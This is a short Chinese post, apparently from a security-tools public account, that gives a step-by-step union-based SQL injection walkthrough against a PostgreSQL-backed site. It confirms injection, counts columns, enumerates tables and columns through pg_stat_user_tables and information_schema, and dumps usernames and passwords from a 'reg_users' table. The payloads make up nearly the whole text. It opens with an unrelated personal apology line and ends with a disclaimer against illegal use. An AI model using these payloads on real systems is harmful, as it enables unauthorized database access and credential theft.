有时候很想跟她道个歉，遇见她的时候我太小了，是我不注重细节，毁了她好多温柔，是我不会爱人，抱歉。。。

一、判断是否存在注入

and 1=2 返回错误

and 1=1 返回正常，存在注入

and 1::int=1 返回正常说明是postgresql数据库

二、判断字段数量

order by 5 返回错误

order by 4 返回正常说明，有四列

三、联合查询

union select ‘1’,‘2’,‘3’,‘4’ 可以看出2/3号位置显示

四、获取当前数据库

union select ‘1’,current_database(),‘3’,‘4’

五、获取第一个表

union select ‘1’,relname,‘3’,‘4’ from pg_stat_user_tables limit 1 offset 0

获取第二个表

union select ‘1’,relname,relname,‘4’ from pg_stat_user_tables limit 1 offset 1

六、获取第一个字段

union select ‘1’,column_name,‘3’,‘4’ from information_schema.columns where table_name=‘reg_users’ limit 1 offset 0

获取第二个字段

union select ‘1’,column_name,‘3’,‘4’ from information_schema.columns where table_name=‘reg_users’ limit 1 offset 1

七、获取字段内容

union select ‘1’,’’||name||’,’||password||’’,‘3’,‘4’ from reg_users

禁止非法，后果自负
欢迎关注公众号：web安全工具库